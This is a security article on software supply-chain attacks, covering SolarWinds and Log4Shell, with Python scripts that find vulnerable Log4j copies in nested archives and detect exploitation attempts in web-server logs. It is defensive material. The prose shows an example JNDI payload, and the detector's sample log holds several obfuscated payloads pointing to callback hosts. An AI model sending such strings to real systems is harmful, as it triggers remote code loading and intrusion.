How to effectively protect your software supply chains from cyber attacks
Software supply chains have become a dangerous point of vulnerability for organizations: a compromised supplier can give attackers a path into internal networks. The risk is high, but organizations can still take concrete action to protect themselves and to prevent attacks that arrive through the supply chain.
For a long time, only a few specialists took an interest in the security risks posed by supply chains, and by software supply chains in particular. That changed with the cyber attack on the IT security company FireEye, disclosed at the end of 2020, which gave many IT managers a resounding wake-up call. The attackers had not broken into FireEye directly: they had first compromised the build environment of the IT management software vendor SolarWinds and planted a backdoor in digitally signed updates of its Orion monitoring platform. FireEye, like every other Orion customer, installed those updates through the platform's regular update mechanism, and with them the backdoor, which was later named SUNBURST. The weak point was therefore not FireEye's own code but its software supplier, whose build and release process had been tampered with without anyone noticing in time.
SolarWinds estimated that up to 18,000 of the roughly 33,000 organizations and authorities running the Orion platform at the time had installed the backdoored update. Even two years later, nobody knows how much damage was really done, not least because the attackers picked only a small subset of those 18,000 for follow-on intrusions. Contemporary software is a complex ecosystem that hardly anyone can keep track of, and there is a reason for that: the days when a small team or a freelancer could develop an application alone and bring it to market are long gone. Programmers today routinely rely on external frameworks, libraries and other third-party components to implement functionality with less effort.
Third-party software enlarges the attack surface
Software development today would be unthinkable without third-party components, yet the software supply chain carries considerable risk and enlarges the attack surface: almost every application in use in organizations depends in some way on components written by someone else. Many people first became aware of how critical this is when the Log4Shell vulnerability (CVE-2021-44228) in the Java logging library Log4j was reported in December 2021. The news hit like a bomb, and many experts feared catastrophic effects across the Internet. In the event, things did not get too bad at first, although plenty of administrators had their hands full.
In many cases nobody knew exactly where Log4j was in use. It was not only present in components integrated directly into applications, but also in sub-components and in their dependencies, often several levels deep and sometimes bundled inside other archives. In recent years many organizations have let software and services proliferate without keeping an inventory, and that is now a serious problem. The vulnerability itself is straightforward to trigger: vulnerable Log4j versions evaluate lookup expressions in the text they log, so an attacker who gets a string of the form ${jndi:ldap://attacker-host/x} into any logged field (an HTTP header or a username, for example) can make the library fetch and execute code from a server under the attacker's control. The effects of a vulnerability like this can be devastating: data breaches in which confidential information is stolen, stealthy manipulation or deletion of data, the injection of malware or ransomware, or hijacked computing power used to mine cryptocurrency.
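Finding the copies of Log4j that never appear in a dependency manifest is the practical problem behind the paragraph above. The script below is an added example, not code from the original article: it opens a JAR, WAR or EAR, recurses into every archive nested inside it, reads the Maven metadata that log4j-core ships in its own pom.properties, and classifies each copy by version and by whether the JndiLookup class that the interim mitigation removes is still present. The 2.17.1 baseline is an assumption for the 2.x line (the 2.12.x and 2.3.x backports for old Java releases are not modelled), and the WAR it scans is constructed in memory with placeholder class bytes so the script runs offline.

```python
import io
import zipfile
from typing import Iterator, List, Tuple

# Maven metadata that every log4j-core JAR carries; it states the exact artifact version.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class that performs the JNDI lookup; deleting it from the JAR was the interim mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumed baseline for the 2.x line: 2.15.0 and 2.16.0 were only partial fixes.
# (The 2.12.x and 2.3.x backports for old Java releases are not modelled here.)
FIXED_VERSION = (2, 17, 1)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties: str) -> Tuple[int, ...]:
    """Return the 'version=' entry of a pom.properties file as a tuple of ints, or () if absent."""
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            raw = line.split("=", 1)[1].strip()
            core = raw.split("-", 1)[0]  # drop qualifiers such as -rc1 or -SNAPSHOT
            try:
                return tuple(int(part) for part in core.split("."))
            except ValueError:
                return ()
    return ()


def classify(version: Tuple[int, ...], jndi_present: bool) -> str:
    """Map version and mitigation state to a status a responder can act on."""
    if not version:
        return "unknown"  # metadata unreadable: needs a human look
    if version >= FIXED_VERSION:
        return "fixed"
    return "vulnerable" if jndi_present else "mitigated"  # old build, JndiLookup removed by hand


def scan_archive(data: bytes, path: str) -> Iterator[dict]:
    """Yield one finding per log4j-core in this archive or in any archive nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # a .jar that is not a valid zip cannot contain Log4j; skip it
    names = zf.namelist()
    name_set = set(names)
    if POM_PROPS in name_set:
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        yield {
            "path": path,
            "version": ".".join(map(str, version)) if version else "unknown",
            "status": classify(version, JNDI_CLASS in name_set),
        }
    # Fat jars, WEB-INF/lib and similar bundles hide Log4j one level down; recurse into them.
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            yield from scan_archive(zf.read(name), f"{path}!/{name}")


def scan_files(paths: List[str]) -> List[dict]:
    """Scan archives on disk and return all findings."""
    findings: List[dict] = []
    for path in paths:
        with open(path, "rb") as fh:
            findings.extend(scan_archive(fh.read(), path))
    return findings


def build_sample_war() -> bytes:
    """Constructed sample WAR (not a real artifact); class entries hold placeholder bytes."""
    def log4j_jar(version: str, with_jndi: bool) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        return buf.getvalue()

    legacy = io.BytesIO()  # an application jar that bundles its own, hand-patched Log4j two levels deep
    with zipfile.ZipFile(legacy, "w") as z:
        z.writestr("lib/log4j-core-2.13.3.jar", log4j_jar("2.13.3", with_jndi=False))

    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", log4j_jar("2.14.1", with_jndi=True))
        z.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", log4j_jar("2.17.1", with_jndi=True))
        z.writestr("WEB-INF/lib/legacy-service-all.jar", legacy.getvalue())
        z.writestr("WEB-INF/lib/broken-lib-1.0.jar", b"not a zip archive")  # exercises the BadZipFile path
    return war.getvalue()


def scan_sample() -> List[dict]:
    """Scan the constructed WAR; used as the stand-alone demo."""
    return list(scan_archive(build_sample_war(), "app.war"))


if __name__ == "__main__":
    for finding in scan_sample():
        print(f"{finding['status']:10} {finding['version']:8} {finding['path']}")
```

Run it against real deployments with scan_files over everything under the application server's deployment directory; the "path" field uses the jar:-URL "!/" convention so a nested hit can be traced back to the archive that bundles it. A "mitigated" result still deserves an upgrade, since it only records that the JndiLookup class is gone, not that the rest of the old build is sound.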
Services reported to be affected by the vulnerability included Amazon Web Services (AWS), Apple's iCloud and the Steam gaming platform. It doesn't bear thinking about what could have happened if services like these had been used to distribute manipulated updates, which is exactly what happened with SolarWinds. Once again, the full extent of the damage caused by the Log4j vulnerability cannot yet be estimated. Security experts assume that in many cases it was used to quietly install a back door, to be used for further attacks once the coast was clear.
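Whether such a back door was planted usually has to be answered from logs, and the first step is finding the exploitation attempts. The detector below is an added example, not part of the original article: it scans web-server log lines for the JNDI lookup string that Log4Shell relies on, after undoing the disguises attackers commonly apply to it (URL-encoding and nested ${lower:...}, ${upper:...} and ${...:-default} lookups, which Log4j resolves from the inside out exactly as this code does). The log lines, IP addresses and callback hosts are constructed for the example.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample in Apache combined-log style; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.5 - - [10/Dec/2021:22:14:03 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9:1389/b}"
198.51.100.7 - - [10/Dec/2021:22:14:05 +0000] "GET /api?x=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/c} HTTP/1.1" 404 0 "-" "curl/7.79.1"
198.51.100.7 - - [10/Dec/2021:22:14:06 +0000] "GET /?q=%24%7B%6Andi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
192.0.2.10 - - [10/Dec/2021:22:14:07 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# An innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Log4j lower-cases the lookup prefix before dispatching, so match case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_obfuscation(body: str) -> Optional[str]:
    """Return the literal an obfuscation-only lookup evaluates to, or None if it is a real lookup."""
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # '${name:-default}' yields the default when 'name' is unset; attackers use empty or bogus names.
        return body.split(":-", 1)[1]
    return None


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until only real lookups remain."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match) -> str:
            nonlocal changed
            literal = resolve_obfuscation(match.group(1))
            if literal is None:
                return match.group(0)
            changed = True
            return literal

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def find_log4shell_attempts(log_text: str) -> List[dict]:
    """Return one record per log line that carries a JNDI lookup after normalisation."""
    hits = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        normalized = deobfuscate(unquote(raw))  # decode percent-encoding first, then nested lookups
        match = JNDI_LOOKUP.search(normalized)
        if not match:
            continue
        end = normalized.find("}", match.start())
        payload = normalized[match.start():] if end == -1 else normalized[match.start():end + 1]
        hits.append({"line": lineno, "payload": payload, "disguised": normalized != raw})
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        flag = "disguised" if hit["disguised"] else "plain"
        print(f"line {hit['line']}: {flag:9} {hit['payload']}")
```

The normalised payload gives the callback host and protocol, which is what to pivot on in proxy and DNS logs when checking whether the vulnerable host actually reached out. The normaliser covers the common substitution tricks but not every one Log4j's lookup syntax allows (quoted literals in date lookups, for example), and a web-server access log only shows fields the web server logs; payloads sent in headers that only the application records, or in non-HTTP inputs, need the same check run over the application's own logs.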